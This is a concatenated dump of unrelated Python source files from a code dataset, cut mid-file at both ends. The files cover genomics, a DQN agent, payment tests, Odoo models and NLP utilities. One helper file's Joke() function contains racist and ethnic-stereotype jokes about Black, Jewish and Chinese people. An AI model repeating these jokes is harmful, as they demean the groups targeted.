= G.Samtools()\r\n\tgenomesize = G.Genomesize()\r\n\tbarcode_index = G.Barcode_index()\r\n\r\n\tC = CFCR()\r\n\tsamdir = os.path.dirname(inputbam)\r\n\tsys.stderr.write(\"[ %s ] split sam file by chr, sort sam file by barcode ... \\n\" % time.asctime())\r\n\t(Samfilepath, HeaderSamFile) = C.split_and_sort_sam(inputbam, samtools, barcode_index, samdir)\r\n\tsys.stderr.write(\"[ %s ] splited and sorted sam file list: %s \\n\\n\" % (time.asctime(), Samfilepath))\r\n\r\n\tsys.stderr.write(\"[ %s ] calculating CF/CR ... \\n\" % time.asctime())\r\n\treport_dir = C.calculate(Samfilepath, genomesize, samdir, inputbam, samtools, Molecule_length, HeaderSamFile)\r\n\tsys.stderr.write(\"[ %s ] files of CF/CR, molecule distribution, molecule coverage and other infos have been placed in directory: %s \\n\" % (time.asctime(), report_dir))\r\n","sub_path":"src/calculate.py","file_name":"calculate.py","file_ext":"py","file_size_in_byte":28866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"319521511","text":"#This is the file for the functions\n\nimport time\nimport datetime\nimport random\n\ndef Calculator(one, two ): # calculate Command\n if(one == '' or two == ''):\n ErrorLog('Didnt enter any number', 54124)\n return 0\n else:\n ans = float(one) + float(two) # Creates a float of the first and second number\n return ans # Returns the final value\n\ndef SayHello(name): # say hello Command\n if(name == ''):\n ErrorLog('String cant be null!', 45898)\n printer = 'null'\n return printer\n else:\n printer = \"Hello %s\" % name # Creates a string that we will return later\n return printer # Returns the string\n\ndef QuitMessage(): # Message function for the quit Command\n print('Quiting...') # Prints out message that its quiting\n time.sleep(1) # Waits one second\n# Rest does the main file\n\ndef Date(): # date Command\n date = datetime.date.today() # Creates a string with today's date\n return date # Returns our date\n\ndef Time(): # time Command\n now = datetime.datetime.now().time() # Creates a string with the time\n return now # Returns the date\n\ndef Today(): # today Command\n date = datetime.date.today() # Creates a string with today's date\n now = datetime.datetime.now().time() # Creates a string with the time\n print('Today is: %s' % date) # Prints out today's date\n print('And the time is %s' % now) # Prints out the time\n\ndef Joke(): # joke Command\n jokes = ['Yo momma is so fat, I took a picture of her last Christmas and it\\'s still printing. ',\n 'Yo momma is so fat when she got on the scale it said, \\\"I need your weight not your phone number.\\\" ',\n 'I asked a Chinese girl for her number. She said, \\\"Sex! Sex! Sex! Free sex tonight!\\\" I said, \\\"Wow!\\\" Then her friend said, \\\"She means 666-3629.\\\" ',\n 'Yo momma is so fat that when she went to the beach a whale swam up and sang, \\\"We are family, even though you\\'re fatter than me.\\\" ',\n 'Do not be racist; be like Mario. He\\'s an Italian plumber, who was made by the Japanese, speaks English, looks like a Mexican, jumps like a black man, and grabs coins like a Jew! ',\n 'Yo momma is so fat, when she sat on an iPod, she made the iPad! ',\n 'Q: Why couldn\\'t the blonde add 10 + 5 on a calculator? \\n'\n 'A: She couldn\\'t find the \"10\" button. ', 'Me: Siri, where is the best place to hide a body? \\n'\n 'Siri: The second page of a Google search.',\n 'Q: Why shouldn\\'t Facebook have paid $1 billion dollars for Instagram? \\n'\n ' A: They could\\'ve downloaded it for free! ', 'Q: How easy is it to count in binary? \\n'\n 'A: It’s as easy as 01 10 11. ',\n 'I put my phone on airplane mode, but it sure ain\\'t flyin\\'. '] # Creates a list with all the jokes (That's why its so big)\n return random.choice(jokes) # Returns a random string from the string\n\ndef ErrorLog(error, errorNumber): # Error Function\n print('Error: %s \\n ' % error ) # Prints out the Problem\n print('Error Number: %s' % errorNumber) # Prints out the Error number\n","sub_path":"Test/Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"235673717","text":"#test without unittest, was being inefficient, these run smoother and are more portable.\n\ntestfolder=r'G:\\My Drive\\libraries\\python\\userKov3\\pySurf\\test' #for economy during development, hard coded path.\n#testfolder os.path.dirname(__file__) #to set it as relative to this file path.\n\nimport os\nfrom format_reader import read_sur\nimport numpy as np\nfrom pySurf.data2D import plot_data\n\n#ported to/from notebook\n\ndef test_zygo(wfile=None):\n\timport os\n\timport matplotlib.pyplot as plt\n\tfrom pySurf.data2D import plot_data\n\t\n\tif wfile is None:\t\n\t\trelpath=r'input_data\\zygo_data\\171212_PCO2_Zygo_data.asc'\n\t\twfile= os.path.join(testfolder,relpath)\n\t\t\n\t(d1,x1,y1)=csvZygo_reader(wfile,ytox=220/1000.,center=(0,0))\n\t(d2,x2,y2)=csvZygo_reader(wfile,ytox=220/1000.,center=(0,0),intensity=True)\n\tplt.figure()\n\tplt.suptitle(relpath)\n\tplt.subplot(121)\n\tplt.title('height map')\n\tplot_data(d1,x1,y1,aspect='equal')\n\tplt.subplot(122)\n\tplt.title('continuity map ')\n\tplot_data(d2,x2,y2,aspect='equal')\n\treturn (d1,x1,y1),(d2,x2,y2)\n\t\n'''\t\ndef csv_points_reader(wfile,*args,**kwargs):\n \"\"\"Read a processed points file in format x,y,z as csv output of analysis routines.\"\"\"\n w0=get_points(wfile,*args,**kwargs)\n w=w0.copy()\n x,y=points_find_grid(w,'grid')[1]\n pdata=resample_grid(w,matrix=True)\n return pdata,x,y\n\ndef csv_zygo_reader(wfile,*args,**kwargs):\n \"\"\"Read a processed points file in format x,y,z as csv output of analysis routines.\"\"\"\n w0=get_points(wfile,*args,**kwargs)\n w=w0.copy()\n x,y=points_find_grid(w,'grid')[1]\n pdata=resample_grid(w,matrix=True)\n return pdata,x,y\n\ndef fits_reader(fitsfile,header=False):\n \"\"\" Generic fits reader, returns data,x,y.\n \n header is ignored. If `header` is set to True is returned as dictionary.\"\"\"\n \n a=fits.open(fitsfile)\n head=a[0].header\n if header: return head\n \n data=a[0].data\n a.close()\n \n x=np.arange(data.shape[1])\n y=np.arange(data.shape[0])\n \n return data,x,y\n'''\n#used by auto_reader to open according to extension\nreader_dic={'.asc':csvZygo_reader,\n '.csv':csv4D_reader,\n #'.fits':fitsWFS_reader,\n '.txt':points_reader,\n '.sur':sur_reader,\n '.dat':points_reader}\n \nif __name__=='__main__':\n \"\"\"It is based on a tentative generic function read_data accepting among arguments a specific reader. \n The function first calls the data reader, then applies the register_data function to address changes of scale etc.\n This works well, however read_data must filter the keywords for the reader and for the register and\n this is hard coded, that is neither too elegant or maintainable. Note however that with this structure it is \n possible to call the read_data procedure with specific parameters, for example in example below, the reader for \n Zygo cannot be called directly with intensity keyword set to True without making a specific case from the other readers, \n while this can be done using read_data. \"\"\"\n \n from pySurf.data2D import plot_data\n tests=[[sur_reader,\n r'test\\input_data\\profilometer\\04_test_directions\\05_xysurf_pp_Intensity.sur'\n ,{'center':(10,15)}],[points_reader,\n r'test\\input_data\\exemplar_data\\scratch\\110x110_50x250_100Hz_xyscan_Height_transformed_4in_deltaR.dat'\n ,{'center':(10,15)}],\n [csvZygo_reader,\n r'test\\input_data\\zygo_data\\171212_PCO2_Zygo_data.asc'\n ,{'strip':True,'center':(10,15)}],\n [csvZygo_reader,\n r'test\\input_data\\zygo_data\\171212_PCO2_Zygo_data.asc'\n ,{'strip':True,'center':(10,15),'intensity':True}]]\n\n plt.ion() \n plt.close('all')\n for r,f,o in tests: #reader,file,options\n print ('reading data %s'%os.path.basename(f))\n plt.figure()\n plt.subplot(121)\n plot_data(*r(f))\n plt.title('raw data')\n plt.subplot(122)\n data,x,y=read_data(f,r,**o)\n plot_data(data,x,y)\n plt.title('registered')\n plt.suptitle(' '.join([\"%s=%s\"%(k,v) for k,v in o.items()]))\n plt.tight_layout()\n plt.show()\nif __name__ == '__main__':\n unittest.main()","sub_path":"pySurf/readers/old/readers_dev/readers/test_read_sur2.py","file_name":"test_read_sur2.py","file_ext":"py","file_size_in_byte":4145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"303931765","text":"from openerp import api, fields, models\n\n\nclass ResPartner(models.Model):\n _inherit = 'res.partner'\n\n criticy = fields.Selection([('critical', 'Critico'), ('no_critical', 'No Critico'), ('occasional', 'Ocasional')],\n 'Criticidad', default=None)\n service_type = fields.Selection([('rental', 'Alquiler Equipos'), ('gas', 'Combustible'),\n ('buy', 'Compra de madera'), ('hardware', 'Ferreteria Industrial'),\n ('maintenance', 'Mantenimiento Automotriz'), ('move', 'Movilizacion'),\n ('civil', 'Obra Civil'), ('replacement', 'Repuesto Mecanico'),\n ('cservice', 'Servicio de Combustible'), ('a_service', 'Servicio de Alimentacion'),\n ('technical', 'Servicio Tecnico'), ('transport', 'Transporte Pesados'),\n ('treatment', 'Tratamiento Desechos')], 'Servicios Prestados')\n\n service_categ = fields.Selection([('feeding', 'Alimentacion'), ('eq_rental', 'Alquiler de Equipos'),\n ('car_rental', 'Alquiler de Vehiculos'),\n ('hardware', 'Ferreteria, equipos y herramientas'),\n ('others', 'Otros'), ('gas_provision', 'Provision de Combustible y Lubricantes'),\n ('wood_provision', 'Provision de Madera'),\n ('replacement', 'Repuesto, Mecanica y mantenimiento'),\n ('transport', 'Transporte')], 'Categorizacion de servicios')\n\n region = fields.Selection([('coast', 'Costa'), ('sierra', 'Sierra'), ('east', 'Oriente'),\n ('inter', 'Internacional')], 'Region')\n\n canton_id = fields.Many2one('canton.state', 'Canton')\n parish_id = fields.Many2one('parish.state', 'Parroquia')\n\nResPartner()\n\n\nclass ParishState(models.Model):\n _name = 'parish.state'\n\n name = fields.Char('Nombre Parroquia', required=True)\n code = fields.Char('Codigo')\n\nParishState()\n\n\nclass CantonState(models.Model):\n _name = 'canton.state'\n\n name = fields.Char('Nombre Canton', required=True)\n code = fields.Char('Codigo')\n\nCantonState()\n","sub_path":"invoice_control/partner.py","file_name":"partner.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"172446422","text":"import model\nimport torch.nn.init as init\nimport torch.nn as nn\nimport random\nimport numpy as np\nimport torch.optim as optim\nimport torch\nimport utils\nimport copy\nimport time\n\n\"\"\"\nhttps://curt-park.github.io/2018-05-17/dqn/ ==> hyperparameter list\nhttps://towardsdatascience.com/deep-q-network-dqn-ii-b6bf911b6b2c ==> reference\n\"\"\"\n\n\nclass Agent:\n\n def __init__(self, env, env_name,storage, explore, lmbda, num_actions, device, explore_timesteps, writer):\n self.env_name = env_name\n self.action_space = env.action_space\n self.train_net = model.DQN(env.observation_space.shape, env.action_space.n).to(device)\n self.target_net = model.DQN(env.observation_space.shape,env.action_space.n).to(device)\n self.storage = storage\n self.env = env\n self.init_explore = 1\n self.final_explore = explore\n self.explore_timesteps = explore_timesteps\n self.lmbda = lmbda\n self.device = device\n self.writer = writer\n self.loss_array = []\n\n # initialize target_net with train_net parameters\n self.target_net.load_state_dict(self.train_net.state_dict())\n\n # Always, only the train_net should be trained\n self.train_net.train()\n self.target_net.eval()\n\n #The Huber loss\n self.loss_func = nn.SmoothL1Loss()\n\n #TODO : implement anneealing learning rate\n self.optimizer = optim.Adam(self.train_net.parameters(), lr = 0.00025)\n\n # Attributes to save the best model\n self.best_reward_mean = None\n self.best_model = None\n\n def action(self, observation):\n with torch.no_grad():\n observation = torch.tensor(observation, dtype = torch.float32).to(self.device)\n action_scores = self.train_net(observation.unsqueeze(0)).cpu()\n action = np.argmax(action_scores)\n return action\n\n def train(self, num_timesteps):\n\n mean_reward_list = []\n tot_reward = 0\n current_state = self.env.reset()\n current_state = torch.FloatTensor(current_state)\n num_episodes = 0\n done = False\n for timestep in range(num_timesteps):\n self.env.render()\n\n #epsilon = utils.linear_explore(self.init_explore, self.final_explore, self.explore_timesteps, timestep)\n epsilon = utils.update_epsilon(timestep)\n self.writer.add_scalar('num_episodes/epsilon', epsilon, timestep)\n if random.random() > epsilon:\n action = self.action(current_state)\n else:\n action = torch.tensor(self.env.action_space.sample())\n\n # the observation returned by the environment is a LazyFrame object, which I don't really want\n # convert this next_state into a numpy array. Much more easier to handle\n #Todo\n # action.item()은 마리오를 위한것\n # 아타리를 할꺼면 action 만 집어넣자\n next_state, reward, done, info = self.env.step(action.item())\n\n tot_reward += reward\n next_state = torch.FloatTensor(next_state)\n\n size = self.storage.store(current_state, action, reward, next_state, done)\n\n # 초반에는 어느정도 experience를 버퍼에 쌓아두고나서 학습을 하고싶어서 이렇게한다.\n\n if timestep > 30000:\n if timestep == 30001:\n print('Training Starts : ', time.time())\n\n loss = self.optimize(timestep)\n self.writer.add_scalar('timestep/loss', loss, timestep)\n\n if timestep % 2000 == 0:\n print('timestep : ', timestep)\n print('Loss : ', loss)\n\n if done:\n mean_reward_list.append(tot_reward)\n mean_reward = np.mean(mean_reward_list[-100:])\n\n if self.best_reward_mean is None or mean_reward > self.best_reward_mean:\n self.best_reward_mean = mean_reward\n\n print(\"%d: %d games, mean reward %.3f, current reward %.3f ,(epsilon %.2f)\" % (timestep, len(mean_reward_list), mean_reward, tot_reward,epsilon))\n\n current_state = self.env.reset()\n current_state = torch.FloatTensor(current_state)\n self.writer.add_scalar('num_episodes/reward', tot_reward, timestep)\n num_episodes += 1\n tot_reward = 0\n else:\n current_state = next_state\n def optimize(self, timestep):\n \"\"\"\n We want to optimize the train_net everytime, but want to optimize the target_net every N times.\n Actually, the target_net should only copy the parameters of the train_net, not be optimized.\n torch has the function\n\n\n \"\"\"\n update_step = 5000\n current_state_batch = None\n reward_batch = None\n next_state_batch = None\n done_batch = None\n\n # 이거 이상하게 보니까 학습이 아예 진행이 안되는데...?!?!!?!?!?!?!?!?!?!?!?!!?!?!!?!?\n # Check whether model parameter has been updated.... And it has!\n # old = list(self.train_net.parameters())[0].clone()\n # print(\"=\"*50)\n # print(self.train_net.state_dict().get('cnn1.weight')[0][3])\n # print(\"=\"*50)\n # print(self.target_net.state_dict().get('fc1.weight'))\n\n loss_array = []\n # Obtain the train_batch\n batch = self.storage.sample(32)\n\n current_state_batch, action_batch, reward_batch, next_state_batch, done_batch = batch\n\n # target_batch = reward_batch + self.lmbda * torch.max(self.target_net(next_state_batch), axis=1).values * (1-done_batch)\n\n target_batch = reward_batch + self.lmbda * self.target_net(next_state_batch).max(1)[0].detach() * (1 - done_batch)\n\n #train_batch = self.train_net(current_state_batch)\n #train_batch = train_batch[torch.arange(train_batch.size(0)), action_batch]\n train_batch = self.train_net(current_state_batch).gather(1, action_batch.unsqueeze(-1)).squeeze(-1)\n\n\n loss = self.loss_func(train_batch, target_batch)\n self.optimizer.zero_grad()\n loss.backward()\n # Not sure about this... Is this the main problem? ==> Doesn't seems so...\n #for param in self.train_net.parameters():\n #param.grad.data.clamp_(-1, 1)\n self.optimizer.step()\n\n\n if timestep % update_step == 0:\n # Successfully checked target network parameters being udpated\n print('NETWORK UPDATED AND SAVED')\n self.target_net.load_state_dict(self.train_net.state_dict())\n torch.save(self.train_net.state_dict(), self.env_name + '-best_model_')\n\n\n # Check whether the train_net parameters has been updated.... And it has!!\n # new = list(self.train_net.parameters())[0].clone()\n\n loss_array.append(loss)\n\n return (np.sum(np.array(loss_array)))\n\n\n def evaluate(self):\n \"\"\"\n used to play the best learned model\n \"\"\"\n self.train_net = torch.load(self.env_name + '-best_model_')\n\n mean_reward_list = []\n tot_reward = 0\n current_state = self.env.reset()\n current_state = torch.FloatTensor(current_state)\n num_episodes = 0\n timestep = 0\n while True:\n self.env.render()\n\n action = self.action(current_state)\n\n # the observation returned by the environment is a LazyFrame object, which I don't really want\n # convert this next_state into a numpy array. Much more easier to handle\n next_state, reward, done, info = self.env.step(action)\n tot_reward += reward\n next_state = torch.FloatTensor(next_state)\n timestep +=1\n\n if done:\n mean_reward_list.append(tot_reward)\n mean_reward = np.mean(mean_reward_list[-100:])\n\n print(\"%d: %d games, mean reward %.3f\" % (timestep, len(mean_reward_list), mean_reward))\n\n current_state = self.env.reset()\n current_state = torch.FloatTensor(current_state)\n num_episodes += 1\n tot_reward = 0\n else:\n current_state = next_state\n\n\n\n def optimize_faulty_trash(self, timestep):\n \"\"\"\n This is messed up....\n Need to erase this\n\n \"\"\"\n current_state_batch = None\n reward_batch = None\n next_state_batch = None\n done_batch = None\n\n\n # 이거 이상하게 보니까 학습이 아예 진행이 안되는데...?!?!!?!?!?!?!?!?!?!?!?!!?!?!!?!?\n # Check whether model parameter has been updated.... And it has!\n #old = list(self.train_net.parameters())[0].clone()\n #print(\"=\"*50)\n #print(self.train_net.state_dict().get('cnn1.weight')[0][3])\n #print(\"=\"*50)\n #print(self.target_net.state_dict().get('fc1.weight'))\n\n loss_array = []\n #Obtain the train_batch\n batch = self.storage.sample(32)\n\n current_state_batch, action_batch, reward_batch, next_state_batch, done_batch = batch\n current_state_batch =current_state_batch.cpu().permute(0,3,1,2).to(self.device)\n action_batch = action_batch.tolist()\n #reward_batch = reward_batch.cpu().to(self.device)\n next_state_batch = next_state_batch.cpu().permute(0,3,1,2).to(self.device)\n #done_batch = done_batch.cpu().to(self.device)\n\n #target_batch = reward_batch + self.lmbda * torch.max(self.target_net(next_state_batch), axis=1).values * (1-done_batch)\n\n target_batch = reward_batch + self.lmbda * self.target_net(next_state_batch).max(1)[0].detach() * (1 - done_batch)\n\n import pdb\n pdb.set_trace()\n train_batch1 = self.train_net(current_state_batch).gather(1, action_batch.unsqueeze(-1)).squeeze(-1)\n\n train_batch = self.train_net(current_state_batch)\n train_batch = train_batch[torch.arange(train_batch.size(0)), action_batch]\n\n loss = self.loss_func(train_batch, target_batch)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n #Not sure about this... Is this the main problem? ==> Doesn't seems so...\n #for param in self.train_net.parameters():\n #param.grad.data.clamp_(-1, 1)\n\n\n if timestep % 1000 == 0:\n for name, param in self.train_net.named_parameters():\n self.writer.add_histogram(name, param.clone().cpu().data.numpy(), timestep)\n self.writer.add_histogram(name+'.grad', param.grad.clone().cpu().data.numpy(), timestep)\n\n #Check whether the train_net parameters has been updated.... And it has!!\n #new = list(self.train_net.parameters())[0].clone()\n\n loss_array.append(loss)\n\n return (np.sum(np.array(loss_array)))\n","sub_path":"DQN_agent.py","file_name":"DQN_agent.py","file_ext":"py","file_size_in_byte":10841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"11991870","text":"from copy import deepcopy\nfrom unittest import mock\nfrom urllib.parse import urlencode\n\nfrom django.conf import settings\nfrom django.test import TestCase\nfrom django.test.utils import override_settings\nfrom django.urls import reverse\n\nfrom cardsave.models import PaymentResult\nfrom cardsave.signals import payment_successful, payment_unsuccessful\n\n\n@override_settings(ROOT_URLCONF='cardsave.tests.test_urls')\n@override_settings(CARDSAVE_MERCHANT_ID = 'TestMerchantID')\n@override_settings(CARDSAVE_CURRENCY_CODE = 826) # ISO 4217 GBP\n@override_settings(CARDSAVE_ORDER_MODEL = 'cardsave.tests.models.Order')\n@override_settings(CARDSAVE_PRESHARED_KEY = 'TestPresharedKey')\n@override_settings(CARDSAVE_PASSWORD = 'TestPassword')\nclass PaymentResultTest(TestCase):\n\n def setUp(self):\n self.RESULT_POST_PARAMS = {\n \"HashDigest\": 'e8d9beccde7b4f1c96c203546059242a270519f7',\n \"MerchantID\": settings.CARDSAVE_MERCHANT_ID,\n \"StatusCode\": 0,\n \"Message\": 'Test message',\n \"PreviousStatusCode\": 0,\n \"PreviousMessage\": ' ',\n \"CrossReference\": ' ',\n \"Amount\": 500, # £5 in pence\n \"CurrencyCode\": 826, # ISO 4217 GBP\n \"OrderID\": '1',\n \"TransactionType\": 'SALE',\n \"TransactionDateTime\": '2015-05-11 10:00:00 +00:00',\n \"OrderDescription\": 'Test description',\n \"CustomerName\": 'Test name',\n \"Address1\": 'Address line 1',\n \"Address2\": 'Address line 2',\n \"Address3\": 'Address line 3',\n \"Address4\": 'Address line 4',\n \"City\": 'TestCity',\n \"State\": 'TestState',\n \"PostCode\": 'APOSTCODE',\n \"CountryCode\": 826,\n \"EmailAddress\": 'test@example.com'\n }\n\n\n def do_post(self, post_params):\n with mock.patch('cardsave.tests.models.Order') as mock_order:\n mock_order.objects = mock.Mock()\n\n conf = {'get.return_value': mock.Mock(\n total_price = 5\n )}\n mock_order.objects.configure_mock(**conf)\n\n post_data = urlencode(post_params)\n response = self.client.post(reverse('cardsave-result'), post_data, content_type='application/x-www-form-urlencoded')\n\n self.assertEqual(response.status_code, 200)\n\n return response\n\n\n def assert_got_signal(self, signal, post_params):\n self.got_signal = False\n self.signal_obj = None\n\n def handle_signal(sender, **kwgargs):\n self.got_signal = True\n self.signal_obj = sender\n\n signal.connect(handle_signal)\n\n response = self.do_post(post_params)\n self.assertTrue(response.content.startswith(b'StatusCode=0'))\n\n payment_results = PaymentResult.objects.all()\n self.assertEqual(len(payment_results), 1)\n payment_result = payment_results[0]\n\n self.assertTrue(self.got_signal)\n self.assertEqual(self.signal_obj, payment_result)\n\n\n def test_payment_result_invalid_hash(self):\n result_post_params = deepcopy(self.RESULT_POST_PARAMS)\n result_post_params['HashDigest'] = 'InvalidHash'\n response = self.do_post(result_post_params)\n self.assertTrue(response.content.startswith(b'StatusCode=30'))\n\n\n def test_payment_successful_signal_received(self):\n self.assert_got_signal(payment_successful, self.RESULT_POST_PARAMS)\n\n\n def test_payment_unsuccessful_signal_received(self):\n result_post_params = deepcopy(self.RESULT_POST_PARAMS)\n result_post_params['StatusCode'] = 4\n result_post_params['HashDigest'] = 'b036c86ce4ad38f3282603a688510cdd47b18849'\n self.assert_got_signal(payment_unsuccessful, result_post_params)\n\n\n def test_payment_successful_transaction_datetime_offset(self):\n result_post_params = deepcopy(self.RESULT_POST_PARAMS)\n result_post_params['TransactionDateTime'] = '2017-07-18 19:30:00 +01:00'\n result_post_params['HashDigest'] = '3aaf42f7db2b9c8d495fc49c7f446b54b0e8795b'\n self.assert_got_signal(payment_successful, result_post_params)\n","sub_path":"paintingdreams/cardsave/tests/test_payment_result.py","file_name":"test_payment_result.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"471273192","text":"import pandas as reader\nimport plotly.io as pio\n\n# Read data source.\nfile_path = 'covid-data/200511COVID19MEXICO.csv'\ndata = reader.read_csv(file_path, encoding='unicode_escape')\ninputDict = data.to_dict(orient='rows')\n\nresults = {}\n# Process each entry. Populate all data required to go through the data just once.\nfor entry in inputDict:\n if entry['RESULTADO'] == 1:\n if entry['FECHA_INGRESO'] in results.keys():\n results[entry['FECHA_INGRESO']] += 1\n else:\n results[entry['FECHA_INGRESO']] = 1\n\nsortedResults = {key: results[key] for key in sorted(results)}\nprint(sortedResults)\ngraph = dict({\n \"data\": [{\"type\": \"scatter\",\n \"x\": list(sortedResults.keys()),\n \"y\": list(sortedResults.values())\n }],\n \"layout\": {\"title\": {\"text\": \"Time series of confirmed cases\"}}\n})\npio.show(graph)\n","sub_path":"graphicator-by-history.py","file_name":"graphicator-by-history.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"385519195","text":"from django.shortcuts import render\r\n\r\n# Create your views here.\r\nfrom django.http import HttpResponse\r\nfrom django.template import loader\r\nfrom django.views.decorators.csrf import csrf_exempt\r\nfrom warnings import simplefilter\r\nsimplefilter(action='ignore', category=FutureWarning)\r\nimport pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn import metrics\r\n@csrf_exempt\r\ndef index(request):\r\n if request.method == 'POST':\r\n Radius = request.POST.get('Radius')\r\n Texture = request.POST.get('Texture')\r\n Perimeter = request.POST.get('Perimeter')\r\n Area = request.POST.get('Area')\r\n df = pd.read_csv('data.csv')\r\n X = df[['Radius_mean','Texture_mean','Perimeter_mean','Area_mean']]\r\n y = df['Diagnosis']\r\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.20, random_state=10)\r\n from sklearn.svm import SVC\r\n svs = SVC(kernel='linear')\r\n svs.fit(X_train, y_train)\r\n y_pred = svs.predict(X_test)\r\n new = {'Radius': [123],\r\n 'Texture': [121],\r\n 'Perimeter': [122],\r\n 'Area': [111]\r\n }\r\n new['Radius'][0] = float(Radius)\r\n new['Texture'][0] = float(Texture)\r\n new['Perimeter'][0] = float(Perimeter)\r\n new['Area'][0] = int(Area)\r\n df2 = pd.DataFrame(new, columns=['Radius', 'Texture','Perimeter','Area'])\r\n y_pred = svs.predict(df2)\r\n name=str(y_pred[0])\r\n context = {\r\n 'name' : name,\r\n }\r\n template = loader.get_template('shwdta.html')\r\n return HttpResponse(template.render(context, request))\r\n else:\r\n template = loader.get_template('indx.html')\r\n return HttpResponse(template.render())","sub_path":"Diagnosispro/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"17796597","text":"from django.utils import simplejson\nfrom django.http import HttpResponse\n\ndef active_login_required(view_func):\n def wrap(request, *args, **kwargs):\n if request.user.is_authenticated():\n return view_func(request, *args, **kwargs)\n if request.is_ajax(): # ajax call #\n c = {'statusMessage' : 'Please Login'}\n json = simplejson.dumps(c)\n return HttpResponse(json, mimetype='application/json; charset=utf-8')\n return render_to_response('login.html', c)\n wrap.__doc__ = view_func.__doc__\n wrap.__dict__ = view_func.__dict__\n return wrap\n\n","sub_path":"sportland/users/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"601532626","text":"#8\n\nlista = []\nfor i in range(5):\n pessoa = []\n pessoa.append(int(input(\"Idade: \")))\n pessoa.append(float(input(\"Altura: \")))\n print(\"#####\")\n lista.append(pessoa)\n\nfor i in range(len(lista)-1,-1,-1):\n print(f\"idade: {lista[i][0]} , altura: {lista[i][1]}\")","sub_path":"lista-2/ex8.py","file_name":"ex8.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"274331803","text":"import pandas as pd\nimport numpy as np\nimport re\nimport cfepm.nlp.preprocessing as nlp\nfrom cfepm.util.io_utils import get_resource_reader\n# from tqdm import tqdm\nfrom collections import defaultdict\nimport logging\n\n_RE_SPEC_KEY_VALUE = re.compile(r\"\"\"'(.+?)':\\s+'(.+?)';\"\"\")\n_log = logging.getLogger(__name__)\n\n\ndef parse_specs(v):\n if pd.isnull(v):\n return {}\n if isinstance(v, dict):\n d = v\n return {k.strip().lower(): _item_spec_val_to_str(v) for k, v in d.items()}\n # assume v is a string\n txt = v\n return {t[0].strip().lower(): t[1].strip() for t in _RE_SPEC_KEY_VALUE.findall(txt) if len(t) == 2}\n\n\ndef _item_spec_val_to_str(v):\n if v is None:\n return None\n if isinstance(v, list):\n return ', '.join(str(e) for e in v)\n if not isinstance(v, str):\n log = logging.getLogger(__name__)\n log.warning(\"Non-str value of item spec: %s\", v)\n return str(v)\n return v\n\n\ndef parse_specs_and_tokenize_vals(txt):\n raw_dict = parse_specs(txt)\n return {k: nlp.tokenize(v) for k, v in raw_dict.items()}\n\n\ndef tokenize_cols(df, *cols):\n if not cols:\n raise ValueError(\"At least single column name was expected!\")\n for col_name in cols:\n _log.debug(\"Tokenizing %s\", col_name)\n df[col_name + '_tokenized'] = df[col_name].apply(nlp.tokenize)\n return df\n\n\ndef tokenize_item(item):\n if item.title_tokenized is None and item.title is not None:\n item.title_tokenized = nlp.tokenize(item.title)\n #if item.description_tokenized is None and item.description is not None:\n # item.description_tokenized = nlp.tokenize(item.description)\n if item.spec_dict_tokenized is None and item.spec_dict is not None:\n item.spec_dict_tokenized = parse_specs_and_tokenize_vals(item.spec_dict)\n\n\ndef item_recognize_numal_expressions(item):\n if item.numal_set is None:\n token_seq_list = []\n if item.title_tokenized is not None:\n token_seq_list.append(item.title_tokenized)\n if item.description_tokenized is not None:\n token_seq_list.append(item.description_tokenized)\n if item.spec_dict_tokenized is not None:\n token_seq_list += (v for v in item.spec_dict_tokenized.values())\n item.numal_set = set(t for token_seq in token_seq_list for t in token_seq if _is_numal_expr(t))\n\n\ndef recognize_numal_expessions(df, target_col, *tokenized_cols):\n if not tokenized_cols:\n raise ValueError(\"At least single column name was expected!\")\n _log.debug(\"Computing %s\", target_col)\n\n def f(row_ss):\n result_set = set()\n for col in tokenized_cols:\n col_val = row_ss[col]\n if col_val is None:\n continue\n if isinstance(col_val, list):\n token_seq = col_val\n result_set.update(t for t in token_seq if _is_numal_expr(t))\n elif isinstance(col_val, dict):\n col_dict = col_val\n result_set.update(t for v in col_dict.values() for t in v if _is_numal_expr(t))\n else:\n raise ValueError(\"Can't handle value of type: %s\" % type(col_val))\n return result_set\n\n result_ss = df.apply(f, axis=1)\n df[target_col] = result_ss\n return df\n\n\ndef _read_colour_set():\n with get_resource_reader('cfepm.nlp', 'colours.txt') as inp:\n lines = (l.strip() for l in inp)\n lines = (l for l in lines if l and not l.startswith('#'))\n return frozenset(lines)\n\n\n_COLOURS = _read_colour_set()\n\n\ndef item_recognize_colours(item):\n if item.colour_set is None and item.title_tokenized is not None:\n item.colour_set = set(t for t in item.title_tokenized if _is_colour(t))\n\n\ndef recognize_colours_df(df, target_col, *tokenized_cols):\n if not tokenized_cols:\n raise ValueError(\"At least single column name was expected!\")\n _log.debug(\"Computing %s\", target_col)\n\n def f(row_ss):\n result_set = set()\n for col in tokenized_cols:\n col_val = row_ss[col]\n if col_val is None:\n continue\n if isinstance(col_val, list):\n token_seq = col_val\n result_set.update(t for t in token_seq if _is_colour(t))\n elif isinstance(col_val, dict):\n col_dict = col_val\n result_set.update(t for v in col_dict.values() for t in v if _is_colour(t))\n else:\n raise ValueError(\"Can't handle value of type: 